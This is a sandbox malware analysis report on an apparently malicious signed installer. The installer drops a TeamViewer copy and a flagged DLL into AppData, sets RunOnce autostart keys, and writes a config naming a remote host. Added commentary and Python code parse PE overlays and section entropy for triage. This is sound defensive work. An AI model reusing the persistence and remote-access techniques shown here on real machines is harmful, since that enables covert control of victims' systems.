Description: Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f

Time: 14:08:10
Type: Autostart
Description: Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f

Time: 14:08:49
Type: API Interceptor
Description: 1x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 4096
Entropy (8bit): 0.5972165353381301
Encrypted: false
SSDEEP: 6:0FE0k1GaD0JOCEfMuaaD0JOCEfMKQmDtS/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0EGaD0JcaaD0JwQQ0tAg/0bjSQJ
MD5: D8D0D663F77B6A59418CC83E759489A3
SHA1: E184E188992F47890C2131012D10A617326571C6
SHA-256: EC7D75FCEB2CE0CE633F11864BE12F44AEF5FF24A105F6E20391247E1F683D2A
SHA-512: 77C91200DF1C5F1B8EACBDFDFEA5FA14274194CDDFC71C4ED88B4A5E1779E9857D61A65EC783179F5D3C66F37568CF3A16E8DA4BBD7FCEDF79ECA1B9597441AA
Malicious: false
Reputation: unknown
                                                                                                                      Preview: ......:{..(.....1....y;.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................1....y;...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage user DataBase, version 0x620, checksum 0x3816929a, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.0970600410052794
Encrypted: false
SSDEEP: 6:6zwl/+aeXRIE11Y8TRXaNUgQKEzwl/+aeXRIE11Y8TRXaNUgQK:60+aeXO4blaegQKE0+aeXO4blaegQK
MD5: 7891AF17428A431A98339B1F99EACACA
SHA1: F7CD13538D809FCBF1C53EE9DD7328229DE4CC1F
SHA-256: 3D3634BEBE4D54F66B45287CF4B2AF761E3D3A4322217FB79DB7324BA4336776
SHA-512: 7C465D3AF93572748353A64A5A10DE8D81A477F2BC81A3B4CF5E36327B913D76DA649304D4260948553DAF01E9C952938815BB2E67A5DDCF68E02D548BE3740C
Malicious: false
Reputation: unknown
                                                                                                                      Preview: 8...... ................e.f.3...w........................&..........w..1....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................G..|1....y..................\..C1....y..........................................................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.11169102851775213
Encrypted: false
SSDEEP: 3:y9EvUCNXAl/bJdAtiif98Ball:yYUUXAt4i0
MD5: C6E7F438F2544EE49F946C530D05A73A
SHA1: 138A4F1DDB20ACD9C683F96E1DE5632ECEE87400
SHA-256: 6C4844ACB817093DA3055F0924DADF4BCC069E3EA8E45B69D9130F3480C62DB3
SHA-512: 05F321F15CE0A76F389D0317C25597BEE96962E1445208C54766BCAB3D609C8AAEB965173CF7F228DA3A67894049C67FE0015E46B7E4B13D0BA3505FBDF8C1D4
Malicious: false
Reputation: unknown
                                                                                                                      Preview: zF......................................3...w..1....y.......w...............w.......w....:O.....w..................\..C1....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\nso5B2F.tmp
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5132919
                                                                                                                      Entropy (8bit):6.737705896318464
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:FjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5ZmfzCAW6LcTjH:tqHuMogsRkyq0umfzCgi
                                                                                                                      MD5:E29F152B606F9669680D7CB24308991A
                                                                                                                      SHA1:680CC154C050B90FEA35AD0FDB97E387D62B7740
                                                                                                                      SHA-256:FF1A9205BD8076DE3811E5417AC2AEAC44D940F392B19C9D8A2833493CC8034F
                                                                                                                      SHA-512:C33DB997837A716A0F09E0E40C61D92BADFAF2A440C8EBB5BAB9F156A2CC61E91DBF7CC748D074F7743E336F93080D4BDABBC14483A23036EC68C9DDEDC40DF5
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ........,.......,.......D.......$.......w...................................................................................................................................................................................................................................................................C...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):75256
                                                                                                                      Entropy (8bit):6.743019659267088
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:coaayOa9Z58qTGIT0XhZKfl2MjEzHPggfLD//qQmoz:p1uZ58qTGITey4zJfLD3qQmC
                                                                                                                      MD5:A44F2649C82B35D42E6036D1C75E48C4
                                                                                                                      SHA1:EE3B00701C97ED107B78ECBDF9D962F1508EDC8E
                                                                                                                      SHA-256:760945429F7EA52C40C75A0FA0424D943E317EC48575C812545CC2C4BE5B0510
                                                                                                                      SHA-512:B8340F06E3446AA91F435F4009557830BBC8E8279321F41198C076E8202869B98C156809CF3FAD8F900B569ACA2AB6B6A7725A1532E2846B31EDEC513E84734D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.l5...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...fRich...f................PE..L.....;a...........!.........H...............................................@......v.....@......................... ...V.......@.......L................%... ..$.......................................................t............................text............................... ..`.rdata..v+.......,..................@..@.data...x...........................@....rsrc...L...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4375848
                                                                                                                      Entropy (8bit):6.621789733656387
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                                      MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                                      SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                                      SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o.......o.......o.....2.o.....q.o.F.2...o...n...o.......o.F.0...o.......o.......o.......o.Rich..o.................PE..L.....LK..................3.........F........03...@...........................K......ZC.......................................@...... K.8`............B.(...........pe4......................x:.....`x:.@............03. ............................text.....3.......3................. ..`.rdata..&....03.......3.............@..@.data...h....P@.."...*@.............@....tls..........K......LB.............@....rsrc...8`... K..b...NB.............@..@........................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
                                                                                                                      Process:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      File Type:data
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):272
                                                                                                                      Entropy (8bit):3.256847641939824
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:cAeYlA3m7D5KTsYKdyp3cQYKDClRAeYlA3m7D5KLp3gk+AeYlA3m7D5KLp3gkp:z7NzdyTmlM7NM397NM3p
                                                                                                                      MD5:64D2D142BE53943D72355DE71619BB22
                                                                                                                      SHA1:D48EC103950F4A66E7774915D6FC36CCA5240D18
                                                                                                                      SHA-256:09F60A98FEC98F6D8E7CC9421FDE08B7B34E6385FA7EC871D19BD640EE7FC881
                                                                                                                      SHA-512:26F508C945EB69D41494A5B53B16BDFCE738606A49F7D2738839FA83ED59700149739EE089F3EEB74C2F4832414B4BBFB0D46F6321EB27BAAD27E8D226B80090
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.u.p.d.a.t.e./.....h.s.n.=.1.....h.t.=.6...../.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.6.....1.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):607528
                                                                                                                      Entropy (8bit):6.564133582926054
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                                      MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                                      SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                                      SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                                      SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....LK...........!.........................................................0.......................................................................0..(.... .......................................................................................rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\vpn.cab
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):71196
                                                                                                                      Entropy (8bit):7.996182851828797
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                                      MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                                      SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                                      SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                                      SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i
                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):55
                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.973639636653341
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:77Etc0bR2v.exe
                                                                                                                      File size:1828192
                                                                                                                      MD5:e71e3b995477081569ed357e4d403666
                                                                                                                      SHA1:809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
                                                                                                                      SHA256:94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
                                                                                                                      SHA512:2dca79011e40164672f7d81ed42fa9f080bca7148e451a0bf94c6bf0f6381e6eb8ee1bc3bac14e690304410a43f46994bfae76ee7d8ee2785ffaecb02f9ebd3b
                                                                                                                      SSDEEP:49152:OBGHLrZP7auvm8sJEkbxH0ulBuw8ZtTUZEoH+hE:vrdTauvkERulBaUZEoH+h
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................\.........

                                                                                                                      File Icon

                                                                                                                      Icon Hash:c403939c989380c8

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x40323c
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:5bd07784f328e868356a895d4ab1a505

                                                                                                                      Authenticode Signature

                                                                                                                      Signature Valid:true
                                                                                                                      Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                      Error Number:0
                                                                                                                      Not Before, Not After
                                                                                                                      • 6/3/2021 5:00:00 PM 6/4/2022 4:59:59 PM
                                                                                                                      Subject Chain
                                                                                                                      • CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:5D5CA7E8D78224799E8AA101FF486137
                                                                                                                      Thumbprint SHA-1:319517761E92EC6EEF1966A5994570D46A498093
                                                                                                                      Thumbprint SHA-256:AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
                                                                                                                      Serial:009B576882CCDB891FD6E4A66671F3AC71

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007F58B4E4EF2Eh
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F458h
call dword ptr [00407158h]
push 004091B8h
push 004236A0h
call 00007F58B4E4EBE1h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F58B4E4EBCFh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F58B4E4C32Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F58B4E4E6C2h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F58B4E4C385h
cmp cl, 00000020h
jne 00007F58B4E4C328h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F58B4E4C31Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0xd628 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1bbf68 | 0x25f8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Note: for IMAGE_DIRECTORY_ENTRY_SECURITY the address field is a raw file offset, not an RVA, which is why no section is listed for it. The Authenticode blob (0x25f8 bytes at file offset 0x1bbf68) therefore sits far beyond the end of the section raw data (the raw sizes in the Sections table sum to well under 0x20000), so roughly 1.7 MB of the file is overlay that no section describes.
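As an added example (not part of the report or of any tool it uses), the following Python reads the section table and the security data directory of a PE32/PE32+ file, treats the security entry as a file offset as the note above describes, and measures how much of the file lies past the last section. The report gives no PointerToRawData values, so the stand-in file it builds assumes a 0x400-byte header and sequential 0x200-aligned sections; those raw offsets, and the file itself, are constructed for illustration. The parsing logic is general and runs unchanged on a real file read from disk.

```python
import struct

# From winnt.h: index of the security (Authenticode) data directory and the
# WIN_CERTIFICATE header values expected for a PKCS#7 signature.
IMAGE_DIRECTORY_ENTRY_SECURITY = 4
WIN_CERT_REVISION_2_0 = 0x0200
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002

# (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData).
# Sizes and VAs are from the report's Sections table; PointerToRawData values
# are ASSUMED (0x400 header, sections packed sequentially) for this stand-in.
SAMPLE_SECTIONS = [
    (".text",  0x5a5a,  0x1000,  0x5c00, 0x400),
    (".rdata", 0x1190,  0x7000,  0x1200, 0x6000),
    (".data",  0x1af98, 0x9000,  0x400,  0x7200),
    (".ndata", 0x20000, 0x24000, 0x0,    0x0),
    (".rsrc",  0xd628,  0x44000, 0xd800, 0x7600),
]
SECURITY_OFFSET, SECURITY_SIZE = 0x1bbf68, 0x25f8   # from the data directories above


def build_sample_pe(sections, security_offset, security_size, file_size):
    """Construct a minimal PE32 image in memory. Only the fields parse_pe reads
    are populated; this is a constructed stand-in, not the analysed file."""
    image = bytearray(file_size)
    e_lfanew = 0x80
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, e_lfanew)
    image[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    coff = e_lfanew + 4
    opt_size = 0xE0                                   # standard PE32 optional header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    struct.pack_into("<HHIIIHH", image, coff, 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = coff + 20
    struct.pack_into("<H", image, opt, 0x10B)         # PE32 magic
    struct.pack_into("<I", image, opt + 92, 16)       # NumberOfRvaAndSizes
    sec_dir = opt + 96 + IMAGE_DIRECTORY_ENTRY_SECURITY * 8
    struct.pack_into("<II", image, sec_dir, security_offset, security_size)
    hdr = opt + opt_size
    for i, (name, vsize, va, rsize, raw_ptr) in enumerate(sections):
        struct.pack_into("<8sIIII", image, hdr + i * 40,
                         name.encode().ljust(8, b"\0"), vsize, va, rsize, raw_ptr)
    # WIN_CERTIFICATE header (dwLength, wRevision, wCertificateType) at the offset
    struct.pack_into("<IHH", image, security_offset, security_size,
                     WIN_CERT_REVISION_2_0, WIN_CERT_TYPE_PKCS_SIGNED_DATA)
    return bytes(image)


def parse_pe(data):
    """Return (sections, (security_file_offset, security_size)) for a PE buffer."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)  # PE32 vs PE32+ directory start
    sec_off, sec_size = struct.unpack_from("<II", data, dir_base + IMAGE_DIRECTORY_ENTRY_SECURITY * 8)
    sections = []
    hdr = opt + opt_size
    for i in range(nsections):
        name, vsize, va, rsize, raw_ptr = struct.unpack_from("<8sIIII", data, hdr + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode(), "vsize": vsize, "va": va,
                         "rsize": rsize, "raw_ptr": raw_ptr})
    return sections, (sec_off, sec_size)


def locate_overlay_and_signature(data):
    """Measure the overlay and locate the Authenticode blob by file offset."""
    sections, (sec_off, sec_size) = parse_pe(data)
    end_of_sections = max(s["raw_ptr"] + s["rsize"] for s in sections)
    overlay_size = len(data) - end_of_sections
    signature = None
    if sec_size:
        if sec_off + 8 > len(data):
            raise ValueError("security directory points outside the file")
        length, revision, cert_type = struct.unpack_from("<IHH", data, sec_off)
        signature = {"offset": sec_off, "length": length, "revision": revision,
                     "type": cert_type, "in_overlay": sec_off >= end_of_sections}
    unsigned = overlay_size - (signature["length"] if signature and signature["in_overlay"] else 0)
    return {"end_of_sections": end_of_sections, "overlay_size": overlay_size,
            "unsigned_overlay_size": unsigned, "signature": signature}


def analyze_sample():
    """Build the constructed stand-in and run the checks on it."""
    data = build_sample_pe(SAMPLE_SECTIONS, SECURITY_OFFSET, SECURITY_SIZE,
                           SECURITY_OFFSET + SECURITY_SIZE)
    return locate_overlay_and_signature(data)


if __name__ == "__main__":
    r = analyze_sample()
    print(f"sections end at 0x{r['end_of_sections']:x}; overlay 0x{r['overlay_size']:x} bytes, "
          f"of which 0x{r['unsigned_overlay_size']:x} are not the signature")
    print("signature:", r["signature"])
```

On a real file, replace `analyze_sample` with `locate_overlay_and_signature(open(path, "rb").read())`. The overlay minus the signature is where an installer stub keeps its payload, so that region, not the sections, is what to carve and scan next.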

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.375217013889 | SysEx File - | 4.24219639454 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x20000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x44000 | 0xd628 | 0xd800 | False | 0.300600405093 | data | 5.06095919413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Note: a .ndata section with a 0x20000-byte virtual size and no raw data is the layout of the NSIS installer stub, and the .data section backed by only 0x400 bytes of file data is likewise filled in at runtime; neither is evidence of packing on its own. The section entropies are all below 7, so the compressed or encrypted content of this file is not in these sections.
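As an added example (not the report's own code), this Python computes the per-byte Shannon entropy that the Entropy column reports and applies the two size checks a triager runs on a section table: raw data missing or much smaller than the mapped size, and entropy high enough to indicate compressed or encrypted bytes. The section tuples are transcribed from the table above; the entropy threshold and growth ratio are chosen here and are not values from the report.

```python
import math
from collections import Counter

# (name, virtual size, raw size, entropy) as listed in the report's Sections table.
REPORT_SECTIONS = [
    (".text",  0x5a5a,  0x5c00, 6.41769823686),
    (".rdata", 0x1190,  0x1200, 4.24219639454),
    (".data",  0x1af98, 0x400,  4.70902740305),
    (".ndata", 0x20000, 0x0,    0.0),
    (".rsrc",  0xd628,  0xd800, 5.06095919413),
]


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_findings(sections, entropy_threshold=7.0, growth_ratio=4.0):
    """Return (section, reason) pairs for sections worth a closer look.

    - raw size 0 with a non-zero virtual size: memory reserved but not backed by file data
    - virtual size >= growth_ratio * raw size: mostly filled in at runtime
    - entropy >= entropy_threshold: compressed or encrypted content
    The thresholds are illustrative defaults, not values from the report.
    """
    findings = []
    for name, vsize, rsize, entropy in sections:
        if rsize == 0 and vsize > 0:
            findings.append((name, f"0x{vsize:x} bytes mapped with no file data behind them"))
        elif rsize and vsize / rsize >= growth_ratio:
            findings.append((name, f"virtual size 0x{vsize:x} is {vsize / rsize:.0f}x raw size 0x{rsize:x}"))
        if entropy >= entropy_threshold:
            findings.append((name, f"entropy {entropy:.2f} suggests packed or encrypted data"))
    return findings


def entropy_of_section_bytes(raw: bytes) -> float:
    """Entropy of an actual section body, for comparison against the table's value."""
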